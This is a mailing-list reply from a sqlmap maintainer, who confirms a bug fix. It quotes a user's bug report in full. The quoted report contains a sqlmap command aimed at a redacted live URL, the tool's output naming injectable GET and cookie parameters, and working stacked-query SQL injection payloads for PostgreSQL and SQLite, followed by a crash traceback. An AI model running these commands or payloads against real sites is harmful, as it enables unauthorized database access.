Re: [sqlmap-users] New Error
From: Miroslav S. <mir...@gm...> - 2010-12-17 07:48:39
thx a lot nightman. find it fixed in the latest revision from SVN repository.

kr

On Fri, Dec 17, 2010 at 7:34 AM, <nig...@em...> wrote:
> sqlmap -u "http://xxxxxx.xxx/html.php?Html_showFile=rss&app_state=4f25b469f81cab0f&xxx=1" -o -a C:\pentest\sqlmap.0.9\txt\user-agents.txt --level 5 --risk 3 -f -b
> [03:44:42] [INFO] testing connection to the target url
> [03:44:52] [INFO] testing NULL connection to the target url
> [03:44:57] [INFO] testing if the url is stable, wait a few seconds
> [03:45:00] [INFO] url is stable
> all the tests....
>
> Cookie parameter 'app_state' is vulnerable. Do you want to keep testing the others? [y/N] y
> sqlmap identified the following injection points with 10051 HTTP(s) requests:
> ---
> Place: GET
> Parameter: xxx
> Type: stacked queries
> Title: PostgreSQL < 8.2 stacked queries (Glibc)
> Payload: Html_showFile=rss&app_state=4f25b469f81cab0f&xxx=1))); CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS CHR(47)|
> |CHR(108)||CHR(105)||CHR(98)||CHR(47)||CHR(108)||CHR(105)||CHR(98)||CHR(99)||CHR(46)||CHR(115)||CHR(111)||CHR(46)||CHR(54), CHR(11
> 5)||CHR(108)||CHR(101)||CHR(101)||CHR(112) language CHR(67) STRICT; SELECT sleep(5);-- AND (((6808=6808
>
> Place: Cookie
> Parameter: app_state
> Type: stacked queries
> Title: SQLite > 2.0 stacked queries (heavy query)
> Payload: app_state=4f25b469f81cab0f'); SELECT LIKE(X'41'||X'42'||X'43'||X'44'||X'45'||X'46'||X'47', UPPER(HEX(RANDOMBLOB(50000
> 000))));-- AND ('eLhg' LIKE 'eLhg;frw_test_cookie=1
> ---
>
> there were multiple injection points, please select the one to use for following injections:
> [0] place: GET, parameter: xxx, type: Unescaped numeric (default)
> [1] place: Cookie, parameter: app_state, type: LIKE single quoted string
> [q] Quit
>> 0
> [07:24:11] [INFO] testing PostgreSQL
> [07:24:12] [WARNING] the back-end DBMS is not PostgreSQL
> [07:24:12] [INFO] testing MySQL
> [07:24:12] [WARNING] the back-end DBMS is not MySQL
> [07:24:12] [INFO] testing Oracle
> [07:24:12] [WARNING] the back-end DBMS is not Oracle
> [07:24:12] [INFO] testing Microsoft SQL Server
> [07:24:13] [WARNING] the back-end DBMS is not Microsoft SQL Server
> [07:24:13] [INFO] the back-end DBMS is SQLite
> [07:24:13] [INFO] fetching banner
> [07:24:13] [INFO] retrieving the length of query output
> [07:24:13] [INFO] retrieved:
> [07:24:16] [INFO] retrieved:
> [07:24:19] [INFO] testing SQLite
> [07:24:20] [WARNING] the back-end DBMS is not SQLite
> [07:24:20] [INFO] testing Microsoft Access
> [07:24:21] [WARNING] the back-end DBMS is not Microsoft Access
> [07:24:21] [INFO] testing Firebird
> [07:24:21] [WARNING] the back-end DBMS is not Firebird
> [07:24:21] [INFO] testing SAP MaxDB
> [07:24:22] [WARNING] the back-end DBMS is not SAP MaxDB
> [07:24:22] [INFO] testing Sybase
> [07:24:22] [WARNING] the back-end DBMS is not Sybase
>
> [07:24:22] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversio
> n repository. If the exception persists, please send by e-mail to sql...@li... the command line, the followi
> ng text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get
> back to you.
> sqlmap version: 0.9-dev
> Python version: 2.6.5
> Operating system: nt
> Traceback (most recent call last):
>   File "C:\pentest\sqlmap.0.9\sqlmap.py", line 79, in main
>     start()
>   File "C:\pentest\sqlmap.0.9\lib\controller\controller.py", line 393, in start
>     action()
>   File "C:\pentest\sqlmap.0.9\lib\controller\action.py", line 57, in action
>     dataToStdout("%s\n" % conf.dbmsHandler.getFingerprint())
> AttributeError: 'NoneType' object has no attribute 'getFingerprint'
>
> [*] shutting down at: 07:24:22
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

--
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia